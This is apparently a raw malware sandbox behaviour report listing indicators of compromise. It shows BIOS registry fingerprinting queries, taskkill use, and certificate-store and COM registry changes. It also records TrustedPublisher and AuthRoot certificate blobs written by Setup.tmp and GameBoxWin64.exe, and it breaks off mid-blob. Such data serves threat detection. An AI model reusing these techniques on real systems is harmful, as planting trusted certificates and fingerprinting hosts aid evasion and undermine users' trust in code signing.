description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS RjFgmagbQ7RmhF0K1UglrkFw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU RjFgmagbQ7RmhF0K1UglrkFw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 6160 taskkill.exe 7800 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mask_svc.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates mask_svc.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} Setup.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" Setup.tmp Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 Setup.tmp -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061